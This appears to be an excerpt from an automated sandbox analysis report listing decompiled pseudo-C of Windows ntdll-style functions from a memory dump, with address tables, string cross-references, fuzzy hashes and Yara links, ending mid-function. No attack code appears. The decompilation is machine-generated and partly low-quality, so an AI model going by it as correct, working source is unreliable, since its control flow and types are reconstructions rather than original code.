				_v1172 = L"BinaryHash";
				_t81 = E03630BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03673706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0363FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03673540;
						E0363FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0364DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03680C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E036397C0();
					}
					return E0363B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03673971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03673884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0363FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03639650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03673787(_a4,  &_v352, _t80);
						}
					}
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E036395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03673552
0x0367355a
0x0367355d
0x03673566
0x03673567
0x0367357e
0x0367358f
0x036735a1
0x036735a5
0x0367366b
0x0367366b
0x0367366d
0x03673672
0x03673679
0x03673685
0x0367368d
0x0367369d
0x036736a7
0x036736b8
0x036736c6
0x036736c7
0x036736dc
0x036736e1
0x036736e7
0x036736e9
0x036736e9
0x03673703
0x03673703
0x036735b5
0x036735c0
0x036735c4
0x00000000
0x00000000
0x036735ca
0x036735d7
0x036735e2
0x036735e6
0x036735e8
0x036735f5
0x036735fa
0x03673603
0x03673604
0x03673609
0x0367360a
0x03673612
0x03673613
0x0367361e
0x03673622
0x03673628
0x0367362f
0x0367362f
0x03673636
0x03673638
0x0367363b
0x03673642
0x03673642
0x03673636
0x03673657
0x03673657
0x0367365c
0x03673662
0x03673669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0367358F

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 6c37580bf099b00d604c472ead57bf8f6732340d0f06c1283129b100d59af72f
Instruction ID: a736bdc31af706a1d8b622142744622aa73962dc050a99dbb49a900a02ba7b74
Opcode Fuzzy Hash: 6c37580bf099b00d604c472ead57bf8f6732340d0f06c1283129b100d59af72f
Instruction Fuzzy Hash: AF4196B6D0062C9BDB21DA50CC80FDEB77CAB45714F5045E9EA08AB240DB309E88CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 036C05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E036C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E036C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03639730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E036BA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E036BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E036C1293(_t79, _v40, E036C07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03617D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E036B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x036c05c5
0x036c05ca
0x036c05d3
0x036c06db
0x036c06db
0x036c06dd
0x036c06e3
0x036c06e3
0x036c05dd
0x036c05e7
0x036c05f6
0x036c0600
0x036c0607
0x036c0610
0x036c0615
0x036c061a
0x036c061c
0x036c061e
0x036c0624
0x036c0625
0x036c0627
0x036c0628
0x036c0631
0x036c0640
0x036c064d
0x036c0654
0x036c0654
0x036c0631
0x036c066d
0x036c0674
0x00000000
0x00000000
0x036c0692
0x036c069e
0x036c06b0
0x036c06a0
0x036c06a9
0x036c06a9
0x036c06b8
0x036c06d6
0x036c06d6
0x00000000

Strings

`, xrefs: 036C0633

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: ec7832b22f9f6c312c5a16cf74838cff542b8fa5ed8389681ad13592151d841e
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 52312432200385ABE720DE65CD84FA7BBE9EBC4754F08422CF948DB280D770E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03673884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03673884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03639650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03614620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03639650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03673893
0x03673896
0x03673899
0x0367389f
0x036738a0
0x036738a4
0x036738a9
0x036738ac
0x036738ad
0x036738ae
0x036738af
0x036738b1
0x036738b4
0x036738bb
0x036738bc
0x036738bd
0x036738c4
0x036738c8
0x036738ca
0x036738ca
0x036738d5
0x0367393e
0x03673940
0x03673942
0x03673952
0x03673954
0x03673961
0x03673961
0x03673967
0x0367396e
0x0367396e
0x03673947
0x0367394c
0x00000000
0x0367394c
0x036738ea
0x036738ee
0x036738f8
0x036738f9
0x036738ff
0x03673900
0x03673902
0x03673903
0x0367390b
0x0367390f
0x03673950
0x00000000
0x03673950
0x03673915
0x0367391d
0x0367391d
0x03673922
0x03673926
0x00000000
0x03673928
0x0367392b
0x0367392b
0x03673935
0x03673937
0x03673937
0x00000000
0x03673935
0x03673926
0x036738f0
0x00000000

Strings

BinaryName, xrefs: 036738B4

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 825a9a66fff29abebea500baf2b7b8352ba749401bcd3b7c3bc9f16a80136b3a
Instruction ID: 96acf394a053631874772f79806ac49da74247536be876c3ddfaf21cb77d0ce7
Opcode Fuzzy Hash: 825a9a66fff29abebea500baf2b7b8352ba749401bcd3b7c3bc9f16a80136b3a
Instruction Fuzzy Hash: 7D31057AD01609AFDB15DA58C945E6BF7B8EB40720F254169E814AB390E7309E00DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0362D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0362D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x36ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03614120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0363B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E036398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E036395D0();
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0362d29c
0x0362d2a6
0x0362d2b1
0x0362d2b5
0x0362d2b6
0x0362d2bc
0x0362d2bd
0x0362d2be
0x0362d2bf
0x0362d2c2
0x0362d2c4
0x0362d2cc
0x0362d384
0x0362d34b
0x0362d34f
0x0362d350
0x0362d351
0x0362d35c
0x0362d35c
0x0362d2d6
0x0362d2da
0x0362d2e1
0x0362d361
0x0362d369
0x0362d36d
0x0362d2e3
0x0362d2e3
0x0362d2e3
0x0362d2e5
0x0362d2ed
0x0362d2f5
0x0362d2fa
0x0362d302
0x0362d303
0x0362d30b
0x0362d30f
0x0362d313
0x0362d318
0x0362d31c
0x0362d320
0x0362d379
0x0362d37d
0x00000000
0x00000000
0x0366affe
0x0366b001
0x0366b011
0x00000000
0x0362d322
0x0362d322
0x0362d330
0x0362d337
0x0362d35d
0x0362d339
0x0362d33f
0x0362d38c
0x0362d38c
0x0362d33f
0x0362d349
0x00000000
0x0362d349

Strings

@, xrefs: 0362D303

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0626ab8325d0ada9de4bc4a121ab1162da3d57b733b513599f61eca5bf3d53ba
Instruction ID: e524241a9c33e7eadab89954e88eebb308cf497cd972b51508499352124aca3e
Opcode Fuzzy Hash: 0626ab8325d0ada9de4bc4a121ab1162da3d57b733b513599f61eca5bf3d53ba
Instruction Fuzzy Hash: E9318DB65087159FC311DF28C980E6BBFE8EB86754F05092EF9A487210D635DD05CF92

Uniqueness

Uniqueness Score: -1.00%

Function 03601B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03601B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0363BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0363A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0363A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03614620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x03601b8f
0x03601b9a
0x03601b9c
0x03601b9e
0x03601ba3
0x03657010
0x03657010
0x00000000
0x03601ba9
0x03601ba9
0x03601bae
0x00000000
0x03601bc5
0x03601bca
0x03601bcf
0x03601bd0
0x03601bd1
0x03601bd2
0x03601bd6
0x03601bdc
0x03601be0
0x03656ffc
0x03657000
0x00000000
0x03657006
0x03657009
0x03657009
0x03601be6
0x03601bec
0x03601c0b
0x03601c0b
0x03601c0c
0x03601c11
0x03601c12
0x03601c15
0x03601c1b
0x03601c1f
0x03601c31
0x03601c33
0x03657026
0x03657026
0x03601c21
0x03601c24
0x03601c24
0x03601bee
0x03601bee
0x03601bf2
0x03601c3a
0x03601bf4
0x03601bf4
0x03601c05
0x03601c05
0x03601c09
0x03601c3e
0x00000000
0x00000000
0x00000000
0x03601c09
0x03601bec
0x03601be0
0x03601bae
0x03601c2e

Strings

WindowsExcludedProcs, xrefs: 03601BC5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c8b39e38f8091a75e7c17b91f2eb00b8edc1db02f6a3475b84328daa73331421
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: E021C57B501228ABCB26DB55C942F5BB7ADEF43754F0A4465FD049B340DA34DD01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0361F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0361F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0361f71d
0x0361f722
0x0361f726
0x03664770
0x0361f765
0x0361f769
0x0361f769
0x0361f732
0x0366477a
0x00000000
0x0366477a
0x0361f738
0x0361f73a
0x0361f73c
0x0361f73f
0x0361f746
0x0361f778
0x0361f7a9
0x0361f7a9
0x0361f754
0x0361f75a
0x0361f75d
0x0361f75f
0x0361f761
0x0361f76f
0x0361f771
0x0361f771
0x0361f76f
0x0361f763
0x00000000
0x0361f763
0x0361f77d
0x0361f7a3
0x0361f7a5
0x00000000
0x0361f7a5
0x0361f77f
0x0361f782
0x0361f784
0x0361f786
0x00000000
0x00000000
0x00000000
0x0361f788
0x0361f748
0x0361f74d
0x0361f78d
0x0361f793
0x0361f7b7
0x0361f7bc
0x00000000
0x0361f7bc
0x0361f798
0x00000000
0x00000000
0x0361f79d
0x0361f7b0
0x00000000
0x0361f7b0
0x0361f79f
0x00000000
0x0361f74f
0x0361f74f
0x00000000
0x0361f74f

Strings

Actx , xrefs: 0361F73F

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 1602bf22dde39b35601773699e7a422c5129a68b3338effef6524ed9d7dd986d
Instruction ID: 9590097015f1d31cee8e6f4941d43dc5f52ec4e2ad3796939d75a5cc25bbde94
Opcode Fuzzy Hash: 1602bf22dde39b35601773699e7a422c5129a68b3338effef6524ed9d7dd986d
Instruction Fuzzy Hash: C411B9377046428BE725CD1DB65C735B2D9EB85664F2C472AE465CF3A1DB70D8628340

Uniqueness

Uniqueness Score: -1.00%

Function 036A8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E036A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x36d0d50);
				E0364D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03685720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0364DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0364DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0364D130(_t34, _t39, _t40);
			}

0x036a8df1
0x036a8df1
0x036a8df1
0x036a8df1
0x036a8df1
0x036a8df1
0x036a8df3
0x036a8df8
0x036a8dfd
0x036a8e00
0x036a8e0e
0x036a8e2a
0x036a8e36
0x036a8e38
0x036a8e3c
0x036a8e46
0x036a8e46
0x036a8e36
0x036a8e50
0x036a8e56
0x036a8e59
0x036a8e5c
0x036a8e60
0x036a8e67
0x036a8e6d
0x036a8e73
0x036a8e74
0x036a8eb1
0x036a8ebd

Strings

Critical error detected %lx, xrefs: 036A8E21

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 3965a32b895678c374d69772dbb2e3bc0979e9c627a6af5aa8ea718b8aa28ff6
Instruction ID: 2787201f81ea03f4ecd7e55c256216debd312f0760088306ab1a67fbc9e79784
Opcode Fuzzy Hash: 3965a32b895678c374d69772dbb2e3bc0979e9c627a6af5aa8ea718b8aa28ff6
Instruction Fuzzy Hash: 93115775E14748EADF24DFA8990979CBFB1BB04314F24825ED569AB392D3350A02CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0368FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0368FF60

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: c36d83792634cf78dc8ed2f2c8305190ccf32f753b445ddee15b5e4b0dd5d097
Instruction ID: 8704d62740c799cc04993d5ab7b0630f4fec73a709a5115e114e0c927410eb09
Opcode Fuzzy Hash: c36d83792634cf78dc8ed2f2c8305190ccf32f753b445ddee15b5e4b0dd5d097
Instruction Fuzzy Hash: AA110075A10244EFDB22EF50CA48F9CBBB1FF09704F188558F5096F6A2C7399944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 036C5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E036C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x36d1178);
				E0364D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E036C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0363D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E036C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
